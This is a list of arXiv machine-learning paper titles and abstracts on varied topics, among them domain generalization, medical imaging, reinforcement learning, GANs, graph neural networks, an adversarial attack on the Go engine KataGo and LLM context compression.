    Domain generalization (DG) is about learning models that generalize well to new domains that are related to, but different from, the training domain(s). It is a fundamental problem in machine learning and has attracted much attention in recent years. A large number of approaches have been proposed. Different approaches are motivated from different perspectives, making it difficult to gain an overall understanding of the area. In this paper, we propose a causal framework for domain generalization and present an understanding of common DG approaches in the framework. Our work sheds new lights on the following questions: (1) What are the key ideas behind each DG method? (2) Why is it expected to improve generalization to new domains theoretically? (3) How are different DG methods related to each other and what are relative advantages and limitations? By providing a unified perspective on DG, we hope to help researchers better understand the underlying principles and develop more effective approaches for this critical problem in machine learning.
    Full-resolution Lung Nodule Segmentation from Chest X-ray Images using Residual Encoder-Decoder Networks. (arXiv:2307.06547v1 [eess.IV])
    Lung cancer is the leading cause of cancer death and early diagnosis is associated with a positive prognosis. Chest X-ray (CXR) provides an inexpensive imaging mode for lung cancer diagnosis. Suspicious nodules are difficult to distinguish from vascular and bone structures using CXR. Computer vision has previously been proposed to assist human radiologists in this task, however, leading studies use down-sampled images and computationally expensive methods with unproven generalization. Instead, this study localizes lung nodules using efficient encoder-decoder neural networks that process full resolution images to avoid any signal loss resulting from down-sampling. Encoder-decoder networks are trained and tested using the JSRT lung nodule dataset. The networks are used to localize lung nodules from an independent external CXR dataset. Sensitivity and false positive rates are measured using an automated framework to eliminate any observer subjectivity. These experiments allow for the determination of the optimal network depth, image resolution and pre-processing pipeline for generalized lung nodule localization. We find that nodule localization is influenced by subtlety, with more subtle nodules being detected in earlier training epochs. Therefore, we propose a novel self-ensemble model from three consecutive epochs centered on the validation optimum. This ensemble achieved a sensitivity of 85% in 10-fold internal testing with false positives of 8 per image. A sensitivity of 81% is achieved at a false positive rate of 6 following morphological false positive reduction. This result is comparable to more computationally complex systems based on linear and spatial filtering, but with a sub-second inference time that is faster than other methods. The proposed algorithm achieved excellent generalization results against an external dataset with sensitivity of 77% at a false positive rate of 7.6.  ( 3 min )
    Parallel bootstrap-based on-policy deep reinforcement learning for continuous flow control applications. (arXiv:2304.12330v3 [cs.LG] UPDATED)
    The coupling of deep reinforcement learning to numerical flow control problems has recently received a considerable attention, leading to groundbreaking results and opening new perspectives for the domain. Due to the usually high computational cost of fluid dynamics solvers, the use of parallel environments during the learning process represents an essential ingredient to attain efficient control in a reasonable time. Yet, most of the deep reinforcement learning literature for flow control relies on on-policy algorithms, for which the massively parallel transition collection may break theoretical assumptions and lead to suboptimal control models. To overcome this issue, we propose a parallelism pattern relying on partial-trajectory buffers terminated by a return bootstrapping step, allowing a flexible use of parallel environments while preserving the on-policiness of the updates. This approach is illustrated on a CPU-intensive continuous flow control problem from the literature.  ( 2 min )
    On Collaboration in Distributed Parameter Estimation with Resource Constraints. (arXiv:2307.06442v1 [cs.LG])
    We study sensor/agent data collection and collaboration policies for parameter estimation, accounting for resource constraints and correlation between observations collected by distinct sensors/agents. Specifically, we consider a group of sensors/agents each samples from different variables of a multivariate Gaussian distribution and has different estimation objectives, and we formulate a sensor/agent's data collection and collaboration policy design problem as a Fisher information maximization (or Cramer-Rao bound minimization) problem. When the knowledge of correlation between variables is available, we analytically identify two particular scenarios: (1) where the knowledge of the correlation between samples cannot be leveraged for collaborative estimation purposes and (2) where the optimal data collection policy involves investing scarce resources to collaboratively sample and transfer information that is not of immediate interest and whose statistics are already known, with the sole goal of increasing the confidence on the estimate of the parameter of interest. When the knowledge of certain correlation is unavailable but collaboration may still be worthwhile, we propose novel ways to apply multi-armed bandit algorithms to learn the optimal data collection and collaboration policy in our distributed parameter estimation problem and demonstrate that the proposed algorithms, DOUBLE-F, DOUBLE-Z, UCB-F, UCB-Z, are effective through simulations.
    Efficient Task Offloading Algorithm for Digital Twin in Edge/Cloud Computing Environment. (arXiv:2307.05888v2 [cs.LG] UPDATED)
    In the era of Internet of Things (IoT), Digital Twin (DT) is envisioned to empower various areas as a bridge between physical objects and the digital world. Through virtualization and simulation techniques, multiple functions can be achieved by leveraging computing resources. In this process, Mobile Cloud Computing (MCC) and Mobile Edge Computing (MEC) have become two of the key factors to achieve real-time feedback. However, current works only considered edge servers or cloud servers in the DT system models. Besides, The models ignore the DT with not only one data resource. In this paper, we propose a new DT system model considering a heterogeneous MEC/MCC environment. Each DT in the model is maintained in one of the servers via multiple data collection devices. The offloading decision-making problem is also considered and a new offloading scheme is proposed based on Distributed Deep Learning (DDL). Simulation results demonstrate that our proposed algorithm can effectively and efficiently decrease the system's average latency and energy consumption. Significant improvement is achieved compared with the baselines under the dynamic environment of DTs.
    Aeolus Ocean -- A simulation environment for the autonomous COLREG-compliant navigation of Unmanned Surface Vehicles using Deep Reinforcement Learning and Maritime Object Detection. (arXiv:2307.06688v1 [cs.RO])
    Heading towards navigational autonomy in unmanned surface vehicles (USVs) in the maritime sector can fundamentally lead towards safer waters as well as reduced operating costs, while also providing a range of exciting new capabilities for oceanic research, exploration and monitoring. However, achieving such a goal is challenging. USV control systems must, safely and reliably, be able to adhere to the international regulations for preventing collisions at sea (COLREGs) in encounters with other vessels as they navigate to a given waypoint while being affected by realistic weather conditions, either during the day or at night. To deal with the multitude of possible scenarios, it is critical to have a virtual environment that is able to replicate the realistic operating conditions USVs will encounter, before they can be implemented in the real world. Such "digital twins" form the foundations upon which Deep Reinforcement Learning (DRL) and Computer Vision (CV) algorithms can be used to develop and guide USV control systems. In this paper we describe the novel development of a COLREG-compliant DRL-based collision avoidant navigational system with CV-based awareness in a realistic ocean simulation environment. The performance of the trained autonomous Agents resulting from this approach is evaluated in several successful navigations to set waypoints in both open sea and coastal encounters with other vessels. A binary executable version of the simulator with trained agents is available at https://github.com/aavek/Aeolus-Ocean
    RulE: Neural-Symbolic Knowledge Graph Reasoning with Rule Embedding. (arXiv:2210.14905v2 [cs.AI] UPDATED)
    Knowledge graph (KG) reasoning is an important problem for knowledge graphs. In this paper, we propose a novel and principled framework called \textbf{RulE} (stands for {Rul}e {E}mbedding) to effectively leverage logical rules to enhance KG reasoning. Unlike knowledge graph embedding (KGE) methods, RulE learns rule embeddings from existing triplets and first-order {rules} by jointly representing \textbf{entities}, \textbf{relations} and \textbf{logical rules} in a unified embedding space. Based on the learned rule embeddings, a confidence score can be calculated for each rule, reflecting its consistency with the observed triplets. This allows us to perform logical rule inference in a soft way, thus alleviating the brittleness of logic. On the other hand, RulE injects prior logical rule information into the embedding space, enriching and regularizing the entity/relation embeddings. This makes KGE alone perform better too. RulE is conceptually simple and empirically effective. We conduct extensive experiments to verify each component of RulE. Results on multiple benchmarks reveal that our model outperforms the majority of existing embedding-based and rule-based approaches.
    EPiC-GAN: Equivariant Point Cloud Generation for Particle Jets. (arXiv:2301.08128v3 [hep-ph] UPDATED)
    With the vast data-collecting capabilities of current and future high-energy collider experiments, there is an increasing demand for computationally efficient simulations. Generative machine learning models enable fast event generation, yet so far these approaches are largely constrained to fixed data structures and rigid detector geometries. In this paper, we introduce EPiC-GAN - equivariant point cloud generative adversarial network - which can produce point clouds of variable multiplicity. This flexible framework is based on deep sets and is well suited for simulating sprays of particles called jets. The generator and discriminator utilize multiple EPiC layers with an interpretable global latent vector. Crucially, the EPiC layers do not rely on pairwise information sharing between particles, which leads to a significant speed-up over graph- and transformer-based approaches with more complex relation diagrams. We demonstrate that EPiC-GAN scales well to large particle multiplicities and achieves high generation fidelity on benchmark jet generation tasks.  ( 2 min )
    Improving and generalizing flow-based generative models with minibatch optimal transport. (arXiv:2302.00482v2 [cs.LG] UPDATED)
    Continuous normalizing flows (CNFs) are an attractive generative modeling technique, but they have been held back by limitations in their simulation-based maximum likelihood training. We introduce the generalized conditional flow matching (CFM) technique, a family of simulation-free training objectives for CNFs. CFM features a stable regression objective like that used to train the stochastic flow in diffusion models but enjoys the efficient inference of deterministic flow models. In contrast to both diffusion models and prior CNF training algorithms, CFM does not require the source distribution to be Gaussian or require evaluation of its density. A variant of our objective is optimal transport CFM (OT-CFM), which creates simpler flows that are more stable to train and lead to faster inference, as evaluated in our experiments. Furthermore, OT-CFM is the first method to compute dynamic OT in a simulation-free way. Training CNFs with CFM improves results on a variety of conditional and unconditional generation tasks, such as inferring single cell dynamics, unsupervised image translation, and Schr\"odinger bridge inference.  ( 2 min )
    A New Formalism, Method and Open Issues for Zero-Shot Coordination. (arXiv:2106.06613v3 [cs.AI] UPDATED)
    In many coordination problems, independently reasoning humans are able to discover mutually compatible policies. In contrast, independently trained self-play policies are often mutually incompatible. Zero-shot coordination (ZSC) has recently been proposed as a new frontier in multi-agent reinforcement learning to address this fundamental issue. Prior work approaches the ZSC problem by assuming players can agree on a shared learning algorithm but not on labels for actions and observations, and proposes other-play as an optimal solution. However, until now, this "label-free" problem has only been informally defined. We formalize this setting as the label-free coordination (LFC) problem by defining the label-free coordination game. We show that other-play is not an optimal solution to the LFC problem as it fails to consistently break ties between incompatible maximizers of the other-play objective. We introduce an extension of the algorithm, other-play with tie-breaking, and prove that it is optimal in the LFC problem and an equilibrium in the LFC game. Since arbitrary tie-breaking is precisely what the ZSC setting aims to prevent, we conclude that the LFC problem does not reflect the aims of ZSC. To address this, we introduce an alternative informal operationalization of ZSC as a starting point for future work.  ( 2 min )
    TRUST-LAPSE: An Explainable and Actionable Mistrust Scoring Framework for Model Monitoring. (arXiv:2207.11290v2 [cs.LG] UPDATED)
    Continuous monitoring of trained ML models to determine when their predictions should and should not be trusted is essential for their safe deployment. Such a framework ought to be high-performing, explainable, post-hoc and actionable. We propose TRUST-LAPSE, a "mistrust" scoring framework for continuous model monitoring. We assess the trustworthiness of each input sample's model prediction using a sequence of latent-space embeddings. Specifically, (a) our latent-space mistrust score estimates mistrust using distance metrics (Mahalanobis distance) and similarity metrics (cosine similarity) in the latent-space and (b) our sequential mistrust score determines deviations in correlations over the sequence of past input representations in a non-parametric, sliding-window based algorithm for actionable continuous monitoring. We evaluate TRUST-LAPSE via two downstream tasks: (1) distributionally shifted input detection, and (2) data drift detection. We evaluate across diverse domains - audio and vision using public datasets and further benchmark our approach on challenging, real-world electroencephalograms (EEG) datasets for seizure detection. Our latent-space mistrust scores achieve state-of-the-art results with AUROCs of 84.1 (vision), 73.9 (audio), and 77.1 (clinical EEGs), outperforming baselines by over 10 points. We expose critical failures in popular baselines that remain insensitive to input semantic content, rendering them unfit for real-world model monitoring. We show that our sequential mistrust scores achieve high drift detection rates; over 90% of the streams show < 20% error for all domains. Through extensive qualitative and quantitative evaluations, we show that our mistrust scores are more robust and provide explainability for easy adoption into practice.  ( 3 min )
    A Survey on Transformers in Reinforcement Learning. (arXiv:2301.03044v2 [cs.LG] UPDATED)
    Transformer has been considered the dominating neural architecture in NLP and CV, mostly under supervised settings. Recently, a similar surge of using Transformers has appeared in the domain of reinforcement learning (RL), but it is faced with unique design choices and challenges brought by the nature of RL. However, the evolution of Transformers in RL has not yet been well unraveled. In this paper, we seek to systematically review motivations and progress on using Transformers in RL, provide a taxonomy on existing works, discuss each sub-field, and summarize future prospects.
    Hiding in Plain Sight: Differential Privacy Noise Exploitation for Evasion-resilient Localized Poisoning Attacks in Multiagent Reinforcement Learning. (arXiv:2307.00268v2 [cs.LG] UPDATED)
    Lately, differential privacy (DP) has been introduced in cooperative multiagent reinforcement learning (CMARL) to safeguard the agents' privacy against adversarial inference during knowledge sharing. Nevertheless, we argue that the noise introduced by DP mechanisms may inadvertently give rise to a novel poisoning threat, specifically in the context of private knowledge sharing during CMARL, which remains unexplored in the literature. To address this shortcoming, we present an adaptive, privacy-exploiting, and evasion-resilient localized poisoning attack (PeLPA) that capitalizes on the inherent DP-noise to circumvent anomaly detection systems and hinder the optimal convergence of the CMARL model. We rigorously evaluate our proposed PeLPA attack in diverse environments, encompassing both non-adversarial and multiple-adversarial contexts. Our findings reveal that, in a medium-scale environment, the PeLPA attack with attacker ratios of 20% and 40% can lead to an increase in average steps to goal by 50.69% and 64.41%, respectively. Furthermore, under similar conditions, PeLPA can result in a 1.4x and 1.6x computational time increase in optimal reward attainment and a 1.18x and 1.38x slower convergence for attacker ratios of 20% and 40%, respectively.
    Human Biophysics as Network Weights: Conditional Generative Models for Dynamic Simulation. (arXiv:2211.01856v3 [cs.LG] UPDATED)
    Simulations of biophysical systems are fundamental for studying physiological mechanisms and developing human machine interfaces. Whilst advanced numerical methods, such as finite element models, can excel in this task, they are extremely computationally expensive to use when generating a large number of simulations or simulating dynamic events with continuously changing structural parameters. We propose an architecture that uses a conditional generative model to interpolate between the numerical model states, dramatically lowering the modeling time while maintaining a high generation accuracy. As a demonstration of this concept, we present BioMime, a hybrid-structured generative model that enables an accurate, ultra-fast, and arbitrarily high temporal-resolution simulation of a specific biophysical system during dynamic changes. This methodology has wide applications in physiological and clinical research as well as in supporting data augmentation strategies for signal analysis, representing a computationally efficient and highly accurate model for biophysical simulations.
    Robust online active learning. (arXiv:2302.00422v5 [stat.ML] UPDATED)
    In many industrial applications, obtaining labeled observations is not straightforward as it often requires the intervention of human experts or the use of expensive testing equipment. In these circumstances, active learning can be highly beneficial in suggesting the most informative data points to be used when fitting a model. Reducing the number of observations needed for model development alleviates both the computational burden required for training and the operational expenses related to labeling. Online active learning, in particular, is useful in high-volume production processes where the decision about the acquisition of the label for a data point needs to be taken within an extremely short time frame. However, despite the recent efforts to develop online active learning strategies, the behavior of these methods in the presence of outliers has not been thoroughly examined. In this work, we investigate the performance of online active linear regression in contaminated data streams. Our study shows that the currently available query strategies are prone to sample outliers, whose inclusion in the training set eventually degrades the predictive performance of the models. To address this issue, we propose a solution that bounds the search area of a conditional D-optimal algorithm and uses a robust estimator. Our approach strikes a balance between exploring unseen regions of the input space and protecting against outliers. Through numerical simulations, we show that the proposed method is effective in improving the performance of online active learning in the presence of outliers, thus expanding the potential applications of this powerful tool.
    Learning Graph ARMA Processes from Time-Vertex Spectra. (arXiv:2302.06887v2 [stat.ML] UPDATED)
    The modeling of time-varying graph signals as stationary time-vertex stochastic processes permits the inference of missing signal values by efficiently employing the correlation patterns of the process across different graph nodes and time instants. In this study, we propose an algorithm for computing graph autoregressive moving average (graph ARMA) processes based on learning the joint time-vertex power spectral density of the process from its incomplete realizations for the task of signal interpolation. Our solution relies on first roughly estimating the joint spectrum of the process from partially observed realizations and then refining this estimate by projecting it onto the spectrum manifold of the graph ARMA process through convex relaxations. The initially missing signal values are then estimated based on the learnt model. Experimental results show that the proposed approach achieves high accuracy in time-vertex signal estimation problems.
    Personalization Disentanglement for Federated Learning: An explainable perspective. (arXiv:2306.03570v2 [cs.LG] UPDATED)
    Personalized federated learning (PFL) jointly trains a variety of local models through balancing between knowledge sharing across clients and model personalization per client. This paper addresses PFL via explicit disentangling latent representations into two parts to capture the shared knowledge and client-specific personalization, which leads to more reliable and effective PFL. The disentanglement is achieved by a novel Federated Dual Variational Autoencoder (FedDVA), which employs two encoders to infer the two types of representations. FedDVA can produce a better understanding of the trade-off between global knowledge sharing and local personalization in PFL. Moreover, it can be integrated with existing FL methods and turn them into personalized models for heterogeneous downstream tasks. Extensive experiments validate the advantages caused by disentanglement and show that models trained with disentangled representations substantially outperform those vanilla methods.
    Revisiting Generalized p-Laplacian Regularized Framelet GCNs: Convergence, Energy Dynamic and Training with Non-Linear Diffusion. (arXiv:2305.15639v3 [cs.LG] UPDATED)
    This paper presents a comprehensive theoretical analysis of the graph p-Laplacian regularized framelet network (pL-UFG) to establish a solid understanding of its properties. We conduct a convergence analysis on pL-UFG, addressing the gap in the understanding of its asymptotic behaviors. Further by investigating the generalized Dirichlet energy of pL-UFG, we demonstrate that the Dirichlet energy remains non-zero throughout convergence, ensuring the avoidance of over-smoothing issues. Additionally, we elucidate the energy dynamic perspective, highlighting the synergistic relationship between the implicit layer in pL-UFG and graph framelets. This synergy enhances the model's adaptability to both homophilic and heterophilic data. Notably, we reveal that pL-UFG can be interpreted as a generalized non-linear diffusion process, thereby bridging the gap between pL-UFG and differential equations on the graph. Importantly, these multifaceted analyses lead to unified conclusions that offer novel insights for understanding and implementing pL-UFG, as well as other graph neural network (GNN) models. Finally, based on our dynamic analysis, we propose two novel pL-UFG models with manually controlled energy dynamics. We demonstrate empirically and theoretically that our proposed models not only inherit the advantages of pL-UFG but also significantly reduce computational costs for training on large-scale graph datasets.
    Adversarial Policies Beat Superhuman Go AIs. (arXiv:2211.00241v4 [cs.LG] UPDATED)
    We attack the state-of-the-art Go-playing AI system KataGo by training adversarial policies against it, achieving a >97% win rate against KataGo running at superhuman settings. Our adversaries do not win by playing Go well. Instead, they trick KataGo into making serious blunders. Our attack transfers zero-shot to other superhuman Go-playing AIs, and is comprehensible to the extent that human experts can implement it without algorithmic assistance to consistently beat superhuman AIs. The core vulnerability uncovered by our attack persists even in KataGo agents adversarially trained to defend against our attack. Our results demonstrate that even superhuman AI systems may harbor surprising failure modes. Example games are available https://goattack.far.ai/.
    A Deep Learning Method for Comparing Bayesian Hierarchical Models. (arXiv:2301.11873v3 [stat.ML] UPDATED)
    Bayesian model comparison (BMC) offers a principled approach for assessing the relative merits of competing computational models and propagating uncertainty into model selection decisions. However, BMC is often intractable for the popular class of hierarchical models due to their high-dimensional nested parameter structure. To address this intractability, we propose a deep learning method for performing BMC on any set of hierarchical models which can be instantiated as probabilistic programs. Since our method enables amortized inference, it allows efficient re-estimation of posterior model probabilities and fast performance validation prior to any real-data application. In a series of extensive validation studies, we benchmark the performance of our method against the state-of-the-art bridge sampling method and demonstrate excellent amortized inference across all BMC settings. We then showcase our method by comparing four hierarchical evidence accumulation models that have previously been deemed intractable for BMC due to partly implicit likelihoods. In this application, we corroborate evidence for the recently proposed L\'evy flight model of decision-making and show how transfer learning can be leveraged to enhance training efficiency. We provide reproducible code for all analyses and an open-source implementation of our method.
    A kernel Stein test of goodness of fit for sequential models. (arXiv:2210.10741v3 [stat.ML] UPDATED)
    We propose a goodness-of-fit measure for probability densities modeling observations with varying dimensionality, such as text documents of differing lengths or variable-length sequences. The proposed measure is an instance of the kernel Stein discrepancy (KSD), which has been used to construct goodness-of-fit tests for unnormalized densities. The KSD is defined by its Stein operator: current operators used in testing apply to fixed-dimensional spaces. As our main contribution, we extend the KSD to the variable-dimension setting by identifying appropriate Stein operators, and propose a novel KSD goodness-of-fit test. As with the previous variants, the proposed KSD does not require the density to be normalized, allowing the evaluation of a large class of models. Our test is shown to perform well in practice on discrete sequential data benchmarks.
    Beyond the Snapshot: Brain Tokenized Graph Transformer for Longitudinal Brain Functional Connectome Embedding. (arXiv:2307.00858v2 [q-bio.NC] UPDATED)
    Under the framework of network-based neurodegeneration, brain functional connectome (FC)-based Graph Neural Networks (GNN) have emerged as a valuable tool for the diagnosis and prognosis of neurodegenerative diseases such as Alzheimer's disease (AD). However, these models are tailored for brain FC at a single time point instead of characterizing FC trajectory. Discerning how FC evolves with disease progression, particularly at the predementia stages such as cognitively normal individuals with amyloid deposition or individuals with mild cognitive impairment (MCI), is crucial for delineating disease spreading patterns and developing effective strategies to slow down or even halt disease advancement. In this work, we proposed the first interpretable framework for brain FC trajectory embedding with application to neurodegenerative disease diagnosis and prognosis, namely Brain Tokenized Graph Transformer (Brain TokenGT). It consists of two modules: 1) Graph Invariant and Variant Embedding (GIVE) for generation of node and spatio-temporal edge embeddings, which were tokenized for downstream processing; 2) Brain Informed Graph Transformer Readout (BIGTR) which augments previous tokens with trainable type identifiers and non-trainable node identifiers and feeds them into a standard transformer encoder to readout. We conducted extensive experiments on two public longitudinal fMRI datasets of the AD continuum for three tasks, including differentiating MCI from controls, predicting dementia conversion in MCI, and classification of amyloid positive or negative cognitively normal individuals. Based on brain FC trajectory, the proposed Brain TokenGT approach outperformed all the other benchmark models and at the same time provided excellent interpretability. The code is available at https://github.com/ZijianD/Brain-TokenGT.git
    Improving Small Language Models on PubMedQA via Generative Data Augmentation. (arXiv:2305.07804v3 [cs.CL] UPDATED)
    Large Language Models (LLMs) have made remarkable advancements in the field of natural language processing. However, their increasing size poses challenges in terms of computational cost. On the other hand, Small Language Models (SLMs) are known for their efficiency, but they often struggle with limited capacity and training data, especially in specific domains. In this paper, we introduce a novel method aimed at improving SLMs in the medical domain using LLM-based generative data augmentation. The objective of our approach is to develop more efficient and capable models that are specifically tailored for specialized applications. Through experiments conducted on the PubMedQA dataset, we demonstrate the effectiveness of LLMs in refining and diversifying existing question-answer pairs. This refinement process leads to improved performance in a significantly smaller model after fine-tuning. Notably, our best SLM, with under 1.6 billion parameters, outperforms the few-shot GPT-4 on the PubMedQA dataset. Our code and generated data are publicly available to facilitate further explorations.
    In-context Autoencoder for Context Compression in a Large Language Model. (arXiv:2307.06945v1 [cs.CL])
    We propose the In-context Autoencoder (ICAE) for context compression in a large language model (LLM). The ICAE has two modules: a learnable encoder adapted with LoRA from an LLM for compressing a long context into a limited number of memory slots, and a fixed decoder which is the target LLM that can condition on the memory slots for various purposes. We first pretrain the ICAE using both autoencoding and language modeling objectives on massive text data, enabling it to generate memory slots that accurately and comprehensively represent the original context. Then, we fine-tune the pretrained ICAE on a small amount of instruct data to enhance its interaction with various prompts for producing desirable responses. Our experimental results demonstrate that the ICAE learned with our proposed pretraining and fine-tuning paradigm can effectively produce memory slots with $4\times$ context compression, which can be well conditioned on by the target LLM to respond to various prompts. The promising results demonstrate significant implications of the ICAE for its novel approach to the long context problem and its potential to reduce computation and memory overheads for LLM inference in practice, suggesting further research effort in context management for an LLM. Our code and data will be released shortly.
    SAN: Inducing Metrizability of GAN with Discriminative Normalized Linear Layer. (arXiv:2301.12811v2 [cs.LG] UPDATED)
    Generative adversarial networks (GANs) learn a target probability distribution by optimizing a generator and a discriminator with minimax objectives. This paper addresses the question of whether such optimization actually provides the generator with gradients that make its distribution close to the target distribution. We derive metrizable conditions, sufficient conditions for the discriminator to serve as the distance between the distributions by connecting the GAN formulation with the concept of sliced optimal transport. Furthermore, by leveraging these theoretical results, we propose a novel GAN training scheme, called slicing adversarial network (SAN). With only simple modifications, a broad class of existing GANs can be converted to SANs. Experiments on synthetic and image datasets support our theoretical results and the SAN's effectiveness as compared to usual GANs. Furthermore, we also apply SAN to StyleGAN-XL, which leads to state-of-the-art FID score amongst GANs for class conditional generation on ImageNet 256$\times$256.
    Local Intrinsic Dimensionality Measures for Graphs, with Applications to Graph Embeddings. (arXiv:2208.11986v2 [cs.LG] UPDATED)
    The notion of local intrinsic dimensionality (LID) is an important advancement in data dimensionality analysis, with applications in data mining, machine learning and similarity search problems. Existing distance-based LID estimators were designed for tabular datasets encompassing data points represented as vectors in a Euclidean space. After discussing their limitations for graph-structured data considering graph embeddings and graph distances, we propose NC-LID, a novel LID-related measure for quantifying the discriminatory power of the shortest-path distance with respect to natural communities of nodes as their intrinsic localities. It is shown how this measure can be used to design LID-aware graph embedding algorithms by formulating two LID-elastic variants of node2vec with personalized hyperparameters that are adjusted according to NC-LID values. Our empirical analysis of NC-LID on a large number of real-world graphs shows that this measure is able to point to nodes with high link reconstruction errors in node2vec embeddings better than node centrality metrics. The experimental evaluation also shows that the proposed LID-elastic node2vec extensions improve node2vec by better preserving graph structure in generated embeddings.
    Climate-Invariant Machine Learning. (arXiv:2112.08440v2 [cs.LG] UPDATED)
    Projecting climate change is a generalization problem: we extrapolate the recent past using physical models across past, present, and future climates. Current climate models require representations of processes that occur at scales smaller than model grid size, which have been the main source of model projection uncertainty. Recent machine learning (ML) algorithms hold promise to improve such process representations, but tend to extrapolate poorly to climate regimes they were not trained on. To get the best of the physical and statistical worlds, we propose a new framework -- termed "climate-invariant" ML -- incorporating knowledge of climate processes into ML algorithms, and show that it can maintain high accuracy across a wide range of climate and geographic conditions in three distinct atmospheric models. Our results suggest that explicitly incorporating physical knowledge into data-driven models of Earth system processes can improve their consistency, data efficiency, and generalizability across climate regimes.
    Tensor Completion via Leverage Sampling and Tensor QR Decomposition for Network Latency Estimation. (arXiv:2307.06848v1 [cs.NI])
    In this paper, we consider the network latency estimation, which has been an important metric for network performance. However, a large scale of network latency estimation requires a lot of computing time. Therefore, we propose a new method that is much faster and maintains high accuracy. The data structure of network nodes can form a matrix, and the tensor model can be formed by introducing the time dimension. Thus, the entire problem can be be summarized as a tensor completion problem. The main idea of our method is improving the tensor leverage sampling strategy and introduce tensor QR decomposition into tensor completion. To achieve faster tensor leverage sampling, we replace tensor singular decomposition (t-SVD) with tensor CSVD-QR to appoximate t-SVD. To achieve faster completion for incomplete tensor, we use the tensor $L_{2,1}$-norm rather than traditional tensor nuclear norm. Furthermore, we introduce tensor QR decomposition into alternating direction method of multipliers (ADMM) framework. Numerical experiments witness that our method is faster than state-of-art algorithms with satisfactory accuracy.
    Joint User and Data Detection in Grant-Free NOMA with Attention-based BiLSTM Network. (arXiv:2209.06392v2 [eess.SP] UPDATED)
    We consider the multi-user detection (MUD) problem in uplink grant-free non-orthogonal multiple access (NOMA), where the access point has to identify the total number and correct identity of the active Internet of Things (IoT) devices and decode their transmitted data. We assume that IoT devices use complex spreading sequences and transmit information in a random-access manner following the burst-sparsity model, where some IoT devices transmit their data in multiple adjacent time slots with a high probability, while others transmit only once during a frame. Exploiting the temporal correlation, we propose an attention-based bidirectional long short-term memory (BiLSTM) network to solve the MUD problem. The BiLSTM network creates a pattern of the device activation history using forward and reverse pass LSTMs, whereas the attention mechanism provides essential context to the device activation points. By doing so, a hierarchical pathway is followed for detecting active devices in a grant-free scenario. Then, by utilising the complex spreading sequences, blind data detection for the estimated active devices is performed. The proposed framework does not require prior knowledge of device sparsity levels and channels for performing MUD. The results show that the proposed network achieves better performance compared to existing benchmark schemes.
    Energy-efficient Deployment of Deep Learning Applications on Cortex-M based Microcontrollers using Deep Compression. (arXiv:2205.10369v2 [cs.LG] UPDATED)
    Large Deep Neural Networks (DNNs) are the backbone of today's artificial intelligence due to their ability to make accurate predictions when being trained on huge datasets. With advancing technologies, such as the Internet of Things, interpreting large quantities of data generated by sensors is becoming an increasingly important task. However, in many applications not only the predictive performance but also the energy consumption of deep learning models is of major interest. This paper investigates the efficient deployment of deep learning models on resource-constrained microcontroller architectures via network compression. We present a methodology for the systematic exploration of different DNN pruning, quantization, and deployment strategies, targeting different ARM Cortex-M based low-power systems. The exploration allows to analyze trade-offs between key metrics such as accuracy, memory consumption, execution time, and power consumption. We discuss experimental results on three different DNN architectures and show that we can compress them to below 10\% of their original parameter count before their predictive quality decreases. This also allows us to deploy and evaluate them on Cortex-M based microcontrollers.
    Generalized Laplacian Regularized Framelet Graph Neural Networks. (arXiv:2210.15092v2 [cs.LG] UPDATED)
    This paper introduces a novel Framelet Graph approach based on p-Laplacian GNN. The proposed two models, named p-Laplacian undecimated framelet graph convolution (pL-UFG) and generalized p-Laplacian undecimated framelet graph convolution (pL-fUFG) inherit the nature of p-Laplacian with the expressive power of multi-resolution decomposition of graph signals. The empirical study highlights the excellent performance of the pL-UFG and pL-fUFG in different graph learning tasks including node classification and signal denoising.
    Declarative Mechanism Design. (arXiv:1912.13122v4 [cs.AI] UPDATED)
    Regulation of Multi-Agent Systems (MAS) and Declarative Electronic Institutions (DEIs) was a multidisciplinary research topic of the past decade involving (Physical and Software) Agents and Law since the beginning, but recently evolved towards News-claimed Robot Lawyer since 2016. One of these first proposals of restricting the behaviour of Software Agentswas Electronic Institutions.However, with the recent reformulation of Artificial Neural Networks (ANNs) as Deep Learning (DL), Security, Privacy,Ethical and Legal issues regarding the use of DL has raised concerns in the Artificial Intelligence (AI) Community. Now that the Regulation of MAS is almost correctly addressed, we propose the Regulation of Artificial Neural Networks as Agent-based Training of a special type of regulated Artificial Neural Network that we call Institutional Neural Network (INN).The main purpose of this paper is to bring attention to Artificial Teaching (AT) and to give a tentative answer showing a proof-of-concept implementation of Regulated Deep Learning (RDL). This paper introduces the former concept and provide sI, a language previously used to model declaratively and extend Electronic Institutions, as a means to regulate the execution of Artificial Neural Networks and their interactions with Artificial Teachers (ATs)
    Efficient Bayesian Policy Reuse with a Scalable Observation Model in Deep Reinforcement Learning. (arXiv:2204.07729v3 [cs.LG] UPDATED)
    Bayesian policy reuse (BPR) is a general policy transfer framework for selecting a source policy from an offline library by inferring the task belief based on some observation signals and a trained observation model. In this paper, we propose an improved BPR method to achieve more efficient policy transfer in deep reinforcement learning (DRL). First, most BPR algorithms use the episodic return as the observation signal that contains limited information and cannot be obtained until the end of an episode. Instead, we employ the state transition sample, which is informative and instantaneous, as the observation signal for faster and more accurate task inference. Second, BPR algorithms usually require numerous samples to estimate the probability distribution of the tabular-based observation model, which may be expensive and even infeasible to learn and maintain, especially when using the state transition sample as the signal. Hence, we propose a scalable observation model based on fitting state transition functions of source tasks from only a small number of samples, which can generalize to any signals observed in the target task. Moreover, we extend the offline-mode BPR to the continual learning setting by expanding the scalable observation model in a plug-and-play fashion, which can avoid negative transfer when faced with new unknown tasks. Experimental results show that our method can consistently facilitate faster and more efficient policy transfer.
    Learning low-rank latent mesoscale structures in networks. (arXiv:2102.06984v5 [cs.SI] UPDATED)
    It is common to use networks to encode the architecture of interactions between entities in complex systems in the physical, biological, social, and information sciences. To study the large-scale behavior of complex systems, it is useful to examine mesoscale structures in networks as building blocks that influence such behavior. We present a new approach for describing low-rank mesoscale structures in networks, and we illustrate our approach using several synthetic network models and empirical friendship, collaboration, and protein--protein interaction (PPI) networks. We find that these networks possess a relatively small number of `latent motifs' that together can successfully approximate most subgraphs of a network at a fixed mesoscale. We use an algorithm for `network dictionary learning' (NDL), which combines a network-sampling method and nonnegative matrix factorization, to learn the latent motifs of a given network. The ability to encode a network using a set of latent motifs has a wide variety of applications to network-analysis tasks, such as comparison, denoising, and edge inference. Additionally, using a new network denoising and reconstruction (NDR) algorithm, we demonstrate how to denoise a corrupted network by using only the latent motifs that one learns directly from the corrupted network.
    Accelerated stochastic approximation with state-dependent noise. (arXiv:2307.01497v2 [math.OC] UPDATED)
